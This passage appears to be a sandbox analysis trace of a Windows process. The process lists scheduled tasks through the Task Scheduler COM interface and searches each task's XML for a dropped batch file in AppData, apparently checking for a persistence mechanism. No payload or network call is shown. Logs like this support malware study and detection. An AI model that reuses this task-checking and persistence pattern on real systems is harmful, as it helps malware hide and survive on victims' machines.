ppTasks=0xce050*=0x9294a0) returned 0x0 [0162.337] IRegisteredTaskCollection:get_Count (in: This=0x9294a0, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0162.337] IRegisteredTaskCollection:get_Item (in: This=0x9294a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929660) returned 0x0 [0162.337] IRegisteredTask:get_Name (in: This=0x929660, pName=0xce058 | out: pName=0xce058*="Consolidator") returned 0x0 [0162.337] IRegisteredTask:get_Xml (in: This=0x929660, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-108)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0162.338] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-108)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.338] IUnknown:Release (This=0x929660) returned 0x0 [0162.338] IRegisteredTaskCollection:get_Item (in: This=0x9294a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929660) returned 0x0 [0162.338] IRegisteredTask:get_Name (in: This=0x929660, pName=0xce058 | out: pName=0xce058*="KernelCeipTask") returned 0x0 [0162.338] IRegisteredTask:get_Xml (in: This=0x929660, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SDFRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n \r\n 1\r\n PT45M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {E7ED314F-2816-4C26-AEB5-54A34D02404C}\r\n \r\n \r\n") returned 0x0 [0162.339] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SDFRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n \r\n 1\r\n PT45M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {E7ED314F-2816-4C26-AEB5-54A34D02404C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.339] IUnknown:Release (This=0x929660) returned 0x0 [0162.339] IRegisteredTaskCollection:get_Item (in: This=0x9294a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929660) returned 0x0 [0162.339] IRegisteredTask:get_Name (in: This=0x929660, pName=0xce058 | out: pName=0xce058*="UsbCeip") returned 0x0 [0162.339] IRegisteredTask:get_Xml (in: This=0x929660, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {C27F6B1D-FE0B-45E4-9257-38799FA69BC8}\r\n \r\n \r\n \r\n") returned 0x0 [0162.340] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {C27F6B1D-FE0B-45E4-9257-38799FA69BC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.340] IUnknown:Release (This=0x929660) returned 0x0 [0162.340] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.340] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9294a0) returned 0x0 [0162.340] ITaskFolderCollection:get_Count (in: This=0x9294a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.340] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.340] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.340] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.341] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.341] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.341] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.341] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Data Integrity Scan") returned 0x0 [0162.341] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-602)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2011-01-01T23:00:00\r\n P7D\r\n \r\n 4\r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n") returned 0x0 [0162.342] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-602)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2011-01-01T23:00:00\r\n P7D\r\n \r\n 4\r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.342] IUnknown:Release (This=0x929610) returned 0x0 [0162.342] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.342] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Data Integrity Scan for Crash Recovery") returned 0x0 [0162.342] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-603)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan for Crash Recovery\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n 7508BCA32907950A\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n \r\n") returned 0x0 [0162.343] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-603)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan for Crash Recovery\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n 7508BCA32907950A\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.343] IUnknown:Release (This=0x929610) returned 0x0 [0162.343] IUnknown:Release (This=0x929480) returned 0x0 [0162.343] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.345] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.345] IUnknown:Release (This=0x929480) returned 0x0 [0162.345] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.345] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.345] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.345] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.345] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.345] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="ScheduledDefrag") returned 0x0 [0162.345] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n \\Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -o -$\r\n \r\n \r\n") returned 0x0 [0162.346] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n \\Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -o -$\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.346] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.346] IUnknown:Release (This=0x929460) returned 0x0 [0162.346] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.346] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.346] IUnknown:Release (This=0x929460) returned 0x0 [0162.346] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.346] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.347] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.347] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.347] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.347] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="Metadata Refresh") returned 0x0 [0162.347] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-601)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-600)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-602)\r\n \\Microsoft\\Windows\\Device Setup\\Metadata Refresh\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {23C1F3CF-C110-4512-ACA9-7B6174ECE888}\r\n \r\n \r\n") returned 0x0 [0162.348] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-601)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-600)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-602)\r\n \\Microsoft\\Windows\\Device Setup\\Metadata Refresh\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {23C1F3CF-C110-4512-ACA9-7B6174ECE888}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.348] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.348] IUnknown:Release (This=0x929470) returned 0x0 [0162.348] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.348] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.348] IUnknown:Release (This=0x929470) returned 0x0 [0162.348] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.348] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.348] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.349] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=9) returned 0x0 [0162.349] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.349] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="IntegrityCheck") returned 0x0 [0162.349] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\IntegrityCheck\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:00:00\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.350] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\IntegrityCheck\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:00:00\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.350] IUnknown:Release (This=0x929620) returned 0x0 [0162.350] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.350] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDeviceAccountChange") returned 0x0 [0162.350] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceAccountChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.351] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceAccountChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.351] IUnknown:Release (This=0x929620) returned 0x0 [0162.351] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.351] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDeviceConnectedToNetwork") returned 0x0 [0162.351] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A0D8B41\r\n 01\r\n 16\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.352] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A0D8B41\r\n 01\r\n 16\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.352] IUnknown:Release (This=0x929620) returned 0x0 [0162.352] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.352] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic1") returned 0x0 [0162.352] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic1\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:30:00\r\n \r\n PT1H\r\n \r\n PT15M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.353] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic1\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:30:00\r\n \r\n PT1H\r\n \r\n PT15M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.353] IUnknown:Release (This=0x929620) returned 0x0 [0162.353] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.353] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic24") returned 0x0 [0162.353] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic24\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n 